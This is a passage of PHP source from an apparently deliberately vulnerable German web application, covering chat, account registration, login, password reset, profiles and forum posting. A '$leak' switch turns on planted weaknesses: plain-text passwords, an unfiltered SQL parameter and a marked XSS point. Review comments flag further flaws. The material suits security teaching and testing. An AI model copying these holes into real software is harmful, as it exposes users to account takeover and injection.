+ ((y[3]) ? '\\x20<span onclick=\'prompt(\"Schlüsselbund:\",window.name.replace(/^key:/,F[0] + \",\" + F[1] + \",\"))\' title=\'Verschlüsselt\'>$lock<\/span>' : ''),
y[4]".(($leak) ? "" : ".replace(v,'')")."]; // Im Sicherheitsmodus nur Inline-Elemente ohne weitere Angaben zulassen
x[1].setAttribute('class','cr');
try {
x[1].innerHTML = '<fieldset><legend>' + x[2] + '<\/legend>' + x[3] + '<\/fieldset>'; // Layout mit Block-Elementen
}
catch(e) { // Workaround for IE6
x[1].innerHTML = x[2] + '<br \/>' + x[3].replace(v,''); // Nur Inline-Elemente zulassen
}
x[0].appendChild(x[1]);
x[0].scrollTop = x[0].scrollHeight;
break;
case 11: // 11:Benutzernamen zurückgeben
return (D[y]) ? D[y] : 'Unbekannt';
}
return 0;
}
var A,B,C,D,E,F,u,v,w,x,y,z; // Vorsicht bei JMORSWXYZ (Noch frei: GHIKLNPQTUV)
try { // Rückkanalmethode festlegen
A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
B = document.chat,
D = [], // Userliste erstellen
E = '0', // Chatnachrichten-Zähler zurücksetzen
F = $a, // [$jschat[prime],$jschat[main],$jschat[base]]
y = B.user.getElementsByTagName('option'); // Benutzernamen auslesen
for(z=1;z<y.length;z++)
D[y[z].value] = y[z].firstChild.data;
y = B.wait.getElementsByTagName('option'); // Refresh-Zeiten für Ajax optimieren
for(z=0;z<y.length;z++)
y[z].style.display = 'block',
y[z].disabled = false;
B.wait.value = 10; // Refresh auf 10 Sekunden setzen
document.getElementById('view').style.display = 'block'; // Chatanzeige aktivieren
document.getElementById('sr3').style.display = 'inline'; // Chatanfragen 'Zeigen' aktivieren
if(F && typeof bigInt != 'undefined' && typeof CryptoJS != 'undefined')// Prüfen ob die Verschlüsselung möglich ist
document.getElementById('cryptchat').style.display = 'inline'; // Verschlüsselung optisch aktivieren
else
F = false, // Verschlüsselung deaktivieren, weil nicht verfügbar
B.crypt.checked = false;
cl(9,B.crypt.checked); // GUI Initialisieren
cl(8,1);")."//--></script></form>";
// With the nojs query parameter the <noscript> tags are unwrapped and the
// <script> block and the onsubmit/onclick/onchange handlers are removed,
// which leaves the plain HTML form.
$out .= (isset($_GET['nojs'])) ? preg_replace("!</?noscript>|<script[^>]*>.*</script>|\son(submit|click|change)='.*?'!s",'',$var) : $var;
}
elseif(isset($_REQUEST['chat'])) { // Allow guests to receive admin messages
// Fallback branch for a 'chat' request (the preceding if is outside this
// excerpt). Only "news[:<last id>]" is accepted and only messages of chat 0
// are returned; the reply uses the same ';'-separated text format as the
// regular news command.
// NOTE(review): when the request is just "news", group 2 takes no part in the
// match and $chat[2] is undefined (notice; intval() then yields 0).
// $val is an integer, so only numbers are spliced into the SQL below.
$out = "0";
if(preg_match('/^(news)(?::(.+))?$/',$_REQUEST['chat'],$chat) and ($var = $sql['sq']($conn,"select ifnull(max(id),'0') from chat where chat = 0")) > ($val = intval($chat[2]))) {
$out .= ";$var;";
if($var > $val and $array = $sql['aq']($conn, /* 2: number of messages */ "
select user,strftime('%Y%m%d%H%M%S',time) as time,text
from [chat]
where chat = '0' and id > $val" /* Do not show chat requests (author's note: leaves a hack possible) */."
order by id") and count($array)) {
$out .= count($array);
// '%' and ';' are hex-escaped because ';' separates the reply fields. The /e
// modifier was removed in PHP 7.0 (preg_replace_callback is the replacement).
foreach($array as $var)
$out .= ";$var[user],$var[time],".preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$var['text']);
}
}
header('Content-Type: text/plain');
die($out);
}
# Eingaben von Formularen auswerten
if(count($_POST) > 0) {
if(isset($_COOKIE[session_name()]) and $_COOKIE[session_name()] == session_id()) { // Auf Gültige Session prüfen
// Runs only after the enclosing check found the session cookie equal to
// session_id(). 'flc' is the failed-attempt counter that the password-reset
// and login code increment; $flc (the limit) is defined elsewhere.
// NOTE(review): the counter lives in $_SESSION, so it limits attempts per
// session only; a per-account or per-address limit would have to be kept on
// the server side.
if(!$leak and isset($_SESSION['flc']) and $_SESSION['flc'] >= $flc) { // In secure mode, make brute force harder
header('HTTP/1.0 403 Forbidden');
die("<h1>Verboten!</h1>");
}
# New registration, profile data change and account deletion
// Handles the register / change / kill buttons of the "Daten" and "Anmelden"
// pages. Registration needs $user (sign-up enabled), the other two a login.
if(preg_match('/^(Dat|Anmeld)en$/',$request) and ($uid or $user) and (isset($_POST['register']) or isset($_POST['change']) or isset($_POST['kill']))) {
// Per-field patterns. They are applied below as "/$var/i" without ^...$
// anchors, so preg_match() picks the first substring that fits and that
// substring ($val[0]) is what gets stored: input is cut down to the pattern
// rather than rejected.
$array = array(
'username' => '[\w.-]{1,64}', 'password' => '[[:print:]]{0,64}', 'probate' => '[[:print:]]{0,64}',
'forename' => '[\w. -]{1,64}', 'lastname' => '[\w. -]{1,64}', 'question' => '\d{0,8}',
'myquestion' => '[\w,. ?-]{0,96}', 'answer' => '[\w. -]{0,96}', 'town' => '[\w. -]{0,64}',
'info' => '[^\']{0,255}', 'born' => '(\d{2}\.\d{2}\.(19|20)\d{2})?',
'mail' => '[\w.-]+@(localhost|[\w.-]+\.\w+|\[?[\d:a-f]+\]?)',
'page' => '((https?:\/\/)?([\w.-]+|\[[\d:a-f]+\])(:\d+)?(\/[\w:;.,_%?=&#\[\]\/-]*)?)?');
// $wrt: user id to edit when the caller has status bit 2 (admin) and sent an
// 'id'; otherwise false. '/\d*/' may also yield an empty string.
$wrt = (floor($status%4/2) and isset($_POST['id']) and preg_match('/\d*/',$_POST['id'],$var)) ? $var[0] : false;
// $html is a strtr() translation table defined elsewhere.
foreach($array as $key => $var)
if(isset($_POST[$key]) and preg_match("/$var/i",$_POST[$key],$val))
$post[$key] = strtr($val[0],$html);
// Continue only if every field matched and both password entries agree.
if(isset($post) and count($post) == count($array) and $post['password'] == $post['probate']) {
// dd.mm.yyyy -> yyyy-mm-dd; a birth date in the future is dropped.
if(isset($post['born']) and $post['born']) {
$post['born'] = implode('-',array_reverse(explode('.',$post['born'])));
if(strtotime($post['born']) > time())
unset($post['born']);
}
// Keep the clear-text password in $val for the dictionary check below.
$val = $post['probate'];
unset($post['probate']);
// Secure mode only: a 12-character salt taken from crypt(rand().time()).
// With $leak on, $salt is false and the password is stored as submitted
// (deliberate weakness behind the $leak switch).
// NOTE(review): rand()/time() are not a cryptographic random source, crypt()
// without a salt argument is rejected as of PHP 8.0, and $hash[0] (defined
// elsewhere) is applied once - password_hash()/password_verify() would be the
// hardened replacement for the whole scheme.
$salt = (!$leak) ? substr(preg_replace('/\W/','',crypt(rand().time())),-12) : false;
if($salt and $post['password'] != '')
$post['password'] = "salt:$salt-hash:".$hash[0]("$salt-$post[password]-".strtolower($post['username']));
// Password hint: "<question id>-<answer>" or "0-<own question>:<answer>".
if(isset($post['question']) and isset($post['answer']) and $post['answer'] != '' and ($post['question'] or isset($post['myquestion']) and $post['myquestion'] != ''))
$post['passhelp'] = ((!$post['question'] and $post['myquestion'] != '') ? "0-$post[myquestion]:" : "$post[question]-")."$post[answer]";
foreach(array('question','myquestion','answer') as $var)
unset($post[$var]);
// Every remaining value is escaped for SQL before it is interpolated below.
// The statements are still built by string concatenation; bound parameters
// would remove the dependency on this step.
foreach($post as $key => $var)
$post[$key] = $sql['es']($var);
// Host names that are exempt from the DNS checks (local addresses, *.xx).
$key = '(localhost|127(\.\d{1,3}){3}|::1|[\w.-]\.xx)';
// Secure mode: refuse passwords that appear in the built-in word list.
// NOTE(review): the <h3> in this message is never closed.
if(!$leak and array_search($val,explode(' ',$attack['_wordlist_'])) !== false)
$out .= "<h3 align='center'>Das Kennwort aus einen <a$rel$tgb href='$wiki/".urlencode("Wörterbuchangriff")."'>Wörterbuch</a> ist zu einfach - Bitte ein sicheres wählen!";
// gethostbyname() returns its argument unchanged when the lookup fails, so
// equality means "does not resolve". The lookups run during the request.
elseif($ipck and !preg_match("/@$key$/",$post['mail']) and ($var = preg_replace('/^[^@]*@/','',$post['mail'])) == gethostbyname($var))
$out .= "<h3 align='center'>Die eMail-Adresse läßt sich nicht auflösen oder ist gerade Offline!</h3>";
elseif($ipck and preg_match("/^$array[page]$/",$post['page'],$var) and count($var) > 3 and !preg_match("/^$key$/",$var[3]) and $var[3] == gethostbyname($var[3]))
$out .= "<h3 align='center'>Die Homepage-Adresse läßt sich nicht auflösen oder ist gerade Offline!</h3>";
// --- Register a new account ---
elseif($user and isset($_POST['register']) and $post['password'] != '') {
// Look for an existing user name or mail address. LIKE is a pattern
// comparison, not strict equality.
if(!$var = $sql['aq']($conn,"
select (select username
from [user]
where username like '$post[username]') as user,
(select mail
from [user]
where mail like '$post[mail]') as mail
where user is not null
or mail is not null",SQLITE_NUM)) {
if($sql['sq']($conn,"select count(*) from [user]") == 0) // The first account becomes the admin
$post['status'] = 2;
// Column names come from the fixed key list above (plus status/passhelp);
// the values were escaped in the loop above.
if(!$sql['e']($conn,"
insert into [user] ([create],[change],[".implode("],[",array_keys($post))."])
values (datetime('now','localtime'),
datetime('now','localtime'),
'".implode("','",$post)."')"))
$out .= "<h3 align='center'>Der Benutzer konnte nicht angelegt werden!</h3>";
else
$request = 'Profil';
}
else {
$key = array();
if(!is_null($var[0][0]))
$key[] = 'Benutzername';
if(!is_null($var[0][1]))
$key[] = 'eMail-Adresse';
$out .= "<h3 align='center'>".implode(' und ',$key).((count($key) > 1) ? " sind" : " ist" )." schon im System vorhanden!</h3>";
}
}
// --- Change data or delete the account: the current password is required ---
// 'userpass' is accepted when it equals the stored password value, or when the
// stored value has the salt:...-hash:... form and the recomputed hash matches.
// Callers without status bit 2 may not submit a value of that form.
// NOTE(review): the digests are compared with ==; hash_equals() gives a
// strict, timing-independent comparison.
elseif($uid and (isset($_POST['change']) or isset($_POST['kill'])) and isset($_POST['userpass'])
and ($status/2%2 or !preg_match('/^salt:\w+-hash:\w+$/',$_POST['userpass'])) and ($sql['sq']($conn,"
select count(*)
from [user]
where (username like '$post[username]' or id = '$wrt')
and password='".$sql['es']($_POST['userpass'])."'") or preg_match('/^salt:(.+?)-hash:(\w+)$/',$sql['sq']($conn,"
select password
from user
where (username like '$post[username]' or id = '$wrt')"),$var) and $var[2] == $hash[0]("$var[1]-$_POST[userpass]-".strtolower($post['username'])))) {
if(isset($_POST['change'])) {
// No new password given: re-hash the current one with the fresh salt (secure
// mode, clear-text input) or leave the stored password untouched.
if($post['password'] == '')
if($salt and !preg_match('/^salt:\w+-hash:\w+$/',$_POST['userpass']))
$post['password'] = "salt:$salt-hash:".$hash[0]("$salt-$_POST[userpass]-".strtolower($post['username']));
else
unset($post['password']);
// Build "[column]='value'" assignments from the escaped values.
$array = array();
foreach($post as $key => $var)
$array[$key] = "[$key]='$var'";
// Row selector: user name (LIKE) or, for admins, the explicit id in $wrt.
$val = str_replace('=',' like ',$array['username']);
if($wrt)
$val = "($val or id = $wrt)";
// Rows with a NULL status (set by the kill branch below) get status 0 first.
@$sql['e']($conn,"
update [user] set status=0
where $val and status is null");
// The target must be logged in (status bit 1) unless the caller is an admin.
if(!$sql['e']($conn,"
update [user] set [change]=datetime('now','localtime'),
".implode(",",$array)."
where $val
and (status%2=1 or $status/2%2 = 1)"))
$out .= "<h3 align='center'>Ihre Daten konnten nicht geändert werden!</h3>";
else
$request = 'Profil';
}
// Delete: the row is kept and only its status is set to NULL.
elseif(isset($_POST['kill']) and $var = $sql['sq']($conn,"
select id
from [user]
where [username] like '$post[username]'
and (status%2=1 or $status/2%2 = 1)")) {
$sql['e']($conn,"
update [user] set
[change]=datetime('now','localtime'),
[changes]=[changes]+1,
[status]=NULL
where id=$var");
$request = '';
}
}
else
$out .= "<h3 align='center'>Ihr altes Kennwort stimmt nicht!</h3>";
}
else
$out .= "<h3 align='center'>Sie haben nicht alle Eingabefelder korrekt ausgefüllt!</h3>";
}
# Forgotten password
// Resets the password of a logged-out user who answers the stored security
// question. With $leak on, $wrt is empty, so forename, lastname and mail are
// neither collected nor checked (deliberate weakness behind the $leak switch).
if(!$uid and isset($_POST['restore'])) {
$post = array();
$wrt = ($leak) ? array() : array(
'forename' => '[\w. -]{1,64}', 'lastname' => '[\w. -]{1,64}',
'mail' => '[\w.-]+@(localhost|[\w.-]+\.\w+|\[?[\d:a-f]+\]?)');
$array = array_merge($wrt,array( 'question' => '\d{1,8}',
'answer' => '[\w. -]{1,96}', 'username' => '[\w.-]{1,64}',
'password' => '[[:print:]]{1,64}', 'probate' => '[[:print:]]{1,64}'));
// The patterns are applied without anchors: the first matching substring of
// each field is kept ($html is a strtr() table defined elsewhere).
foreach($array as $key => $var)
if(isset($_POST[$key]) and preg_match("/$var/i",$_POST[$key],$val))
$post[$key] = strtr($val[0],$html);
if(isset($post['username']) and ($leak or isset($post['mail']) and isset($post['forename']) and isset($post['lastname']))) {
// Load the stored hint ("<question id>-..." or "0-<own question>:...") and
// overwrite the posted question id with the stored one.
if($var=$sql['sq']($conn,"select passhelp from [user] where username like '$post[username]'".(($leak) ? "" : " and mail like '$post[mail]'")) and preg_match('/^(\d+)-(?:(?<=0-)(.+?):)?/',$var,$var)) {
if(!$post['question'] = $var[1])
$post['myquestion'] = ($var[2] != '') ? $var[2] : false;
}
else
$out .= "<h3 align='center'>Das Kennwort kann nicht zurückgesetzt werden, da keine Sicherheitsfrage hinterlegt wurde!</h3>";
if(isset($post['password']) and isset($post['probate']) and $post['password'] == $post['probate']) {
// The answer is verified by the WHERE clause of the update itself;
// $sql['c'] presumably reports the number of changed rows - verify.
// NOTE(review): this path stores the new password as submitted, without the
// salt/hash step of the registration code, also when $leak is off. The
// comparisons use LIKE, a pattern match, where equality on bound parameters
// would be the hardened form.
if(isset($post['question']) and isset($post['answer']) and ($leak or isset($post['forename']) and isset($post['lastname'])) and $sql['e']($conn,"
update [user]
set password='".$sql['es']($post['password'])."'
where username like '$post[username]'".(($leak) ? "" : "
and mail like '$post[mail]'
and forename like '$post[forename]'
and lastname like '$post[lastname]'")."
and passhelp like '$post[question]-".((!$post['question'] and isset($post['myquestion']) and $post['myquestion']) ? "$post[myquestion]:" : "")."$post[answer]'") and $sql['c']($conn)) {
$request = '';
$out .= "<h3 align='center'>Ihr Kennwort wurde jetzt neu gesetzt!</h3>";
// $row makes the login code that follows sign the user in with the new password.
$row = true;
}
else {
$out .= "<h3 align='center'>Die Sicherheitsfrage muss korrekt beantwortet werden!</h3>";
// Secure mode: count the failed attempt in the session.
if(!$leak)
$_SESSION['flc'] = (isset($_SESSION['flc'])) ? $_SESSION['flc'] + 1 : 1;
}
}
else
$out .= "<h3 align='center'>Sie haben noch kein neues korrektes Kennwort vergeben!</h3>";
}
else
$out .= "<h3 align='center'>Sie müssen alle Felder ausfüllen!</h3>";
}
# Perform the login
// Runs for the login form and directly after a successful password reset ($row).
if(!$uid and ($row or isset($_POST['login'])) and isset($_POST['username']) and isset($_POST['password'])) {
// The user name is reduced to [\w.:@[]-], the password to printable characters.
$post = array( 'username' => preg_replace('/[^\w.:@\[\]-]+/','',$_POST['username']),
'password' => preg_replace('/[^[:print:]]/','',$_POST['password']));
// The account is looked up by user name or mail address (LIKE, i.e. a pattern
// comparison). The password is then accepted if one of these holds:
//  1. it equals the stored value (clear-text storage); input that itself has
//     the salt:...-hash:... form is blanked first;
//  2. the stored value is salt:...-hash:... and the recomputed hash matches;
//  3. secure mode only: the client sent "<user>:<digest>" and the digest
//     matches $hash[0] over the session nonce $_SESSION['sha'] and the stored
//     password value (or its hash part).
// NOTE(review): in variant 3 the stored value itself is the secret the
// response is computed from. The digests are compared with ==; hash_equals()
// gives a strict, timing-independent comparison.
if(($val = $sql['aq']($conn,"
select id,username,password,status,change
from [user]
where (username like '$post[username]'
or mail like '$post[username]')
and status is not null")) and $val = $val[0] and (preg_replace('/^salt:\w+-hash:\w+$/','',$post['password']) == $val['password']
or preg_match('/^salt:(.+?)-hash:(\w+)$/',$val['password'],$var) and $var[2] == $hash[0]("$var[1]-$post[password]-".strtolower($val['username']))
or !$leak and isset($_SESSION['sha']) and preg_match('/^([@\w.-]+):(\w+)$/',$post['password'],$var) and $var[1] == $post['username']
and ($var[2] == $hash[0]("$_SESSION[sha]-".$val['password']) or $var[2] == $hash[0]("$_SESSION[sha]-".preg_replace('/^salt:\w+-hash:(\w+)$/','$1',$val['password']))))) {
// All session variables are dropped (including the failed-login counter).
// NOTE(review): no session_regenerate_id() call is visible in this block.
foreach($_SESSION as $key => $var)
unset($_SESSION[$key]);
$uid = $val['id'];
// Keep the higher status bits and set bit 1 ("logged in").
$status = floor($val['status']/2)*2+1;
$_SESSION['lua'] = $val['change'];
$_SESSION['uid'] = $uid;
// NOTE(review): the loop above has already removed $_SESSION['src'], so the
// requests column always gets +0 and the unset() further down never runs -
// confirm the intent. $addr is defined elsewhere and interpolated unescaped;
// verify that it can only hold an address.
$sql['e']($conn,"
update [user] set
status=(status/2%8*2+1),
logins=logins+1,
requests=requests+".((isset($_SESSION['src'])) ? $_SESSION['src'] : 0).",
change=datetime('now','localtime'),
ip='$addr',
session='".$sql['es'](session_id())."',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'".((isset($_POST['info'])) ? ",
info=nullif('".$sql['es']($_POST['info'])."','')" : "")."
where id=".$val['id']);
if(isset($_SESSION['src']))
unset($_SESSION['src']);
if(!$request and !$query)
$request = 'Profil';
// "Stay logged in": the cookie holds "<uid>.<digest of username:stored
// password value>" for $ctl seconds. It is set without the secure/httponly
// arguments and stays valid until the stored password value changes.
if(isset($_POST['forever']) and $_POST['forever'])
setcookie('login',"$uid.".$hash[0]("$val[username]:$val[password]"),time()+$ctl,$self);
else
setcookie('username',$val['username']);
}
else {
// Failed login: clear the password and, in secure mode, count the attempt.
$post['password'] = '';
if(!$leak)
$_SESSION['flc'] = (isset($_SESSION['flc'])) ? $_SESSION['flc'] + 1 : 1;
}
}
# Save the profile
// The profile text is escaped for SQL only ($sql['es']); unlike the forum
// title and message it does not pass through strtr(...,$html), so it is stored
// as submitted - the author marks this statement with "XSS". Output encoding
// would have to happen where the profile is rendered (not visible here).
// Target row: a foreign 'uid' (first digit run of the value) is honoured only
// if the session user's status%4 is 3 (logged in and admin); otherwise the
// caller's own row, which must have status bit 1 set.
if($uid and !isset($_POST['stop']) and !isset($_POST['test']) and isset($_POST['profil']) and $sql['e']($conn,"
update [user] set
change=datetime('now','localtime'),
changes=changes+1,
profil=nullif('".$sql['es']($_POST['profil'])."','')
where id=".((isset($_POST['uid']) and $_POST['uid'] != $uid and preg_match('/\d+/',$_POST['uid'],$var)) ? "$var[0]
and (select status
from [user]
where id=$_SESSION[uid])%4 = 3" : "$_SESSION[uid] and status%2=1"))) // XSS (author's marker)
$request = 'Profil';
# Edit a blog entry
// Allowed only if the posted 'mail' equals the caller's id and that id is the
// userid of the forum row named by 'id' (first digit run of the value).
// Title and message pass through strtr(...,$html) and $sql['es'] before they
// are interpolated. '/[01]/' is unanchored: the first 0 or 1 in 'right' is used.
// NOTE(review): $addr is defined elsewhere and interpolated unescaped; verify
// that it can only hold an address.
if($request == 'Beitrag' and $uid and isset($_POST['save']) and isset($_POST['mail']) and isset($_POST['message']) and isset($_POST['title']) and isset($_POST['id']) and preg_match('/\d+/',$_POST['id'],$var)
and $uid == $_POST['mail'] and $_POST['mail'] == $sql['sq']($conn,"select userid from [forum] where id = $var[0]") and $sql['e']($conn,"
update [forum] set".((isset($_POST['right']) and preg_match('/[01]/',$_POST['right'],$val)) ? "\n\t\tstatus=status/2%2*2+$val[0]%2," : "")."
change=datetime('now','localtime'),
changes=changes+1,
ip='$addr',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."',
title=nullif('".$sql['es'](strtr($_POST['title'],$html))."',''),
message='".$sql['es'](strtr($_POST['message'],$html))."'
where status is not null and id = $var[0]"))
$request = 'Blog';
# Save a forum post
// '$var = array('')' only initialises $var inside the condition ('and' binds
// weaker than '='). Requirements: a non-empty message, a logged-in user or
// guest posting enabled ($gast), and either 'max' equal to the newest post id
// or a newest post written by someone else (double-post guard). 'mail' must be
// empty or the numeric id of an existing user.
// The path value spliced into the insert is read from the database
// (ifnull(path,'/')||id||'/'), not taken from the request.
elseif($var = array('') and isset($_POST['save']) and isset($_POST['mail']) and isset($_POST['title']) and isset($_POST['max']) and isset($_POST['message']) and $_POST['message'] != ''
and ($uid or $gast) and ($_POST['max'] == $sql['sq']($conn,'select max(id) from [forum]') or (($gast) ? 0 : $uid) != $sql['sq']($conn,"
select userid
from [forum]
where id = (select max(id)
from [forum])")) and ($_POST['mail'] == '' or preg_match('/^\d+$/',$_POST['mail'],$var) and $sql['sq']($conn,"
select id
from [user]
where status is not null and id=$var[0]")) and $sql['e']($conn,"
insert into [forum] ([create],[change],[status],[userid],[mailid],[ip],[useragent],[path],[title],[message])
values (datetime('now','localtime'),datetime('now','localtime'),
".((isset($_POST['right']) and preg_match('/[01]/',$_POST['right'],$val)) ? $val[0]%2 : 0).",
".(($uid) ? $uid : 0).",
nullif('$var[0]',''),
'$addr',
'".$sql['es']($_SERVER['HTTP_USER_AGENT'])."',
nullif('".((isset($_POST['id']) and preg_match('/^\d+$/',$_POST['id'],$val) and $val = $sql['sq']($conn,"select ifnull(path,'/')||id||'/' from [forum] where id=$val[0]")) ? $val : '')."',''),
nullif('".$sql['es'](strtr($_POST['title'],$html))."',''),
'".$sql['es'](strtr($_POST['message'],$html))."')"))
// Next page: the forum for a public post, 'Blog' for a post addressed to
// oneself, 'Mail' for one addressed to another user.
$request = ($var[0]) ? (($var[0] == $uid) ? 'Blog' : 'Mail') : '';
}
else
$out .= "<h3><a$rel$tgb href='$wiki/Hypertext_Transfer_Protocol#HTTP_POST'>POST-Requests</a> ohne <a$rel$tgb href='$wiki/Sitzungsbezeichner'>Session-Cookies</a> werden ignoriert!</h3>";
}
# Delete mails
// Soft delete: the row stays and its status becomes NULL. Allowed only if the
// caller's id is the mailid of the entry (first digit run of 'kill').
// NOTE(review): this state change is driven by a GET parameter and sits
// outside the POST branch with its session-cookie check.
if(preg_match('/Blog|Mail/',$request) and $uid and isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var) and $uid == $sql['sq']($conn,"select mailid from [forum] where id = $var[0]"))
$sql['e']($conn,"update [forum] set status=null where status is not null and id=$var[0]");
# Save the tagline
// The value is read from $_REQUEST, so it is accepted from any request
// method, and it is escaped for SQL only. With status bit 2 (admin) an 'id'
// parameter selects another user's row (first digit run of the value).
// NOTE(review): like the mail deletion above, this write sits outside the
// POST branch with its session-cookie check.
if($uid and !isset($_REQUEST['stop']) and !isset($_REQUEST['test']) and isset($_REQUEST['tl']))
$sql['e']($conn,"
update [user] set
change=datetime('now','localtime'),
changes=changes+1,
tagline=nullif('".$sql['es']($_REQUEST['tl'])."','')
where id=".(($status/2%2 and isset($_REQUEST['id']) and preg_match('/\d+/',$_REQUEST['id'],$var)) ? $var[0] : $uid));
# Log out
// Clears status bit 1 and the chat of the caller's row. With an 'id' GET
// parameter the statement targets that user instead, provided the caller's
// status%4 is 3 (logged in and admin).
// With $leak on, $_GET['id'] is concatenated into the statement unfiltered
// (deliberate weakness behind the $leak switch); the secure branch reduces it
// to digits first.
// $sql['c'] presumably reports the number of changed rows - verify.
// NOTE(review): '!' binds tighter than '/' and '%', so '!$status/2%2' is
// evaluated as ((!$status)/2)%2, which is always 0; '!($status/2%2)' was
// probably intended. As written the session is cleared only when no 'id'
// parameter was sent.
if(preg_match('/^Abmelden\s?$/',$request)) {
if($sql['e']($conn,"
update [user] set status=(status/2%8*2),
chat=null,
change=datetime('now','localtime')
where ".((isset($_GET['id']) and $_GET['id']) ? "(select status%4 from [user] where id=nullif('$uid',''))=3 and id=".(($leak) ? $_GET['id'] : preg_replace('/\D/','',$_GET['id']))
: "id='$uid' and status%2=1")) and $sql['c']($conn) and (!$status/2%2 or !isset($_GET['id']))) {
session_unset();
// Expire the persistent login cookie as well.
if(isset($_COOKIE['login'])) {
setcookie('login',0,time()-$ctl,$self);
unset($_COOKIE['login']);
}
}
// if(substr($request,-1) != ' ')
$request = '';
// The rest of this request is handled as logged out in every case.
$uid = $status = false;
}
# Login form
// Prepends the login box (markup plus inline script) to $out for visitors
// that are not logged in, depending on the requested page and the settings.
// NOTE(review): the alternatives '(<|<)' / '(>|>)' in the pattern below and
// the strtr tables "'&' => '&'" further down read like HTML entities that
// were decoded when this copy was made - compare with the original file.
if(!$uid and (!preg_match('/^(Anmelden|Kennwort|SQL|Beitrag|Creole)$/',$request,$var) and !$info[3] and (($user or !$lone) and !$content or !is_array($content) and preg_match('/(<|<){3}login(\d?)(>|>){3}/i',$content,$var) or $request == 'Login') or !$inet and !$local and trim($request) == 'Impressum')) {
// Prefill the user name from the 'username' cookie. With $leak on the cookie
// value is used as sent.
// NOTE(review): in the secure branch the character class is negated, so the
// expression keeps the leading run of characters OUTSIDE [\w.:@[]-] and drops
// the rest - this looks inverted compared with the filter in the login code;
// confirm. How $post['username'] is encoded when $formcheck writes it into
// the form is not visible here.
if(!(isset($post['username']) and $post['username']) and isset($_COOKIE['username']) and $_COOKIE['username'])
$post['username'] = ($leak) ? $_COOKIE['username'] : preg_replace('/^([^\w.:@\[\]-]*).*$/','$1',$_COOKIE['username']);
// Secure mode: load the script that provides the client-side hash function.
if(!$leak and $hash)
$head['hash'] = "<script type='text/javascript' src='$hash[1]'></script>";
// Secure mode only: the onsubmit handler fetches "<name>:<salt>" from
// "$self?salt=<user name>" with a synchronous request and replaces the
// password field by "<user>:<digest>", where the digest covers the session
// nonce and the salted password hash. The nonce is created and stored in
// $_SESSION['sha'] while this string is built.
// NOTE(review): the nonce is a hash over time(), rand() and $_SERVER, not
// output of a cryptographic random source. The 'hide' cookie only stores
// whether the box is collapsed.
$out = "<table align='right' id='lis' style='display:none'><tr><td><a href='#' title='Login einblenden' onclick='".strtr(preg_replace($js,'',"
document.getElementById('lih').style.display = 'block';
document.getElementById('lis').style.display = 'none';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/))
? (x[2] & 65535-(1<<0)) + (1<<0) * 0 : 0)+ '; path=$self';
return false;
"),array('&' => '&', "'" => '"'))."'>«</a></td></tr></table>
<table align='right' id='lih' cellspacing='0' cellpadding='0'><tr><td><form name='login' action='$self".(($request) ? "/$request" : "")."' method='post'".(($leak) ? "" : " onsubmit='".strtr(preg_replace($js,'',"
if(typeof $hash[2] == 'function' && $hash[2]()) {
try { // Request vorbereiten
var a = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
a = new ActiveXObject('Microsoft.XMLHTTP');
}
a.open('GET','$self?salt=' + (x = document.login).username.value,false); // Salt vom Benutzer anfordern
a.send('');
x.password.value = x.username.value + ':' + $hash[3]('".($_SESSION['sha'] = $hash[0](time().rand().implode(":",$_SERVER)))."' + '-' + ((a=a.responseText.match(/^([\w.-]+):(\w+)$/)) ? $hash[3](a[2] + '-' + x.password.value + '-' + a[1].toLowerCase()) : x.password.value));
}"),array('&' => '&', "'" => '"'))."'").">
<fieldset><legend><b>Login</b> <a href='#' title='Login ausblenden' id='lia' style='display:none' onclick='".strtr(preg_replace($js,'',"
document.getElementById('lih').style.display = 'none';
document.getElementById('lis').style.display = 'block';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/))
? (x[2] & 65535-(1<<0)) + (1<<0) * 1 : 1<<0) + '; path=$self';
return false;
"),array('&' => '&', "'" => '"')).preg_replace($formcheck[0],$formcheck[1],"'>»</a></legend>
{username|Benutzername oder eMail:|20|64|tabindex=1}<br />{password|Kennwort:".((!$local and !$inet) ? "" : " (<a href='$self/Kennwort'>Vergessen?</a>)")."|*20|64|tabindex=2}<br />
<input type='checkbox' id='forever' name='forever' value='1' /> <label for='forever'><small title='Für ".floor($ctl/(24*60*60))." Tage'>Angemeldet bleiben</small></label><br />
<input type='hidden' name='info' value='' /><input type='submit' name='login' value='OK' tabindex='3' /><br /><br />".(($user and ($local or $inet)) ? "<a href='$self/Anmelden'>Neues Mitglied werden</a>" : ""))
."</fieldset></form></td></tr></table><script type='text/javascript'><!--\n".preg_replace($js,'',"
document.getElementById('lia').style.display = 'inline';
if(window.innerWidth && window.innerWidth < 1000 || ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) && x[2] & (1<<0))".((is_array($var) and isset($var[2]) and $var[2]) ? " || 1" : "").")
document.getElementById('lih').style.display = 'none',
document.getElementById('lis').style.display = 'block';
var x = document.login;
x.info.value = screen.width + ',' + screen.height + ',' + screen.colorDepth;
if(x.username.value == '')
x.username.focus();
else
if(x.password.value == '')
x.password.focus();
")."//login//--></script>$out";
}
# Datei-Upload
if($uid and $request == 'Datei') {
$len = $sql['sq']($conn,"select sum(abs(size)) from [file] where user = $uid and status is not null");
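// File area request handling: at most one of the four actions below (upload, edit, delete, restore) runs per request.
// 1) Upload: a file arrived and PHP reported no upload error.
if(isset($_FILES['file']) and !$_FILES['file']['error'] and file_exists($_FILES['file']['tmp_name'])) {
// Stored name: the posted name if non-empty, otherwise the client-supplied file name. Everything outside [\w!,.-]
// is removed, which is what keeps the quoted '$name' in the SQL below free of quote characters.
$name = preg_replace('/[^\w!,.-]/','',((isset($_POST['name']) and $_POST['name'] != '') ? $_POST['name'] : $_FILES['file']['name']));
// Quota check for non-admins ($status/2%2 is the admin bit). The condition used to read "!$status/2%2":
// "!" binds tighter than "/" and "%", so it evaluated to 0 for every user and neither this quota check nor the
// extension check below could ever reject an upload. The reported overrun now also counts the file being uploaded.
if(!($status/2%2) and ($len + $_FILES['file']['size']) > $maxfile)
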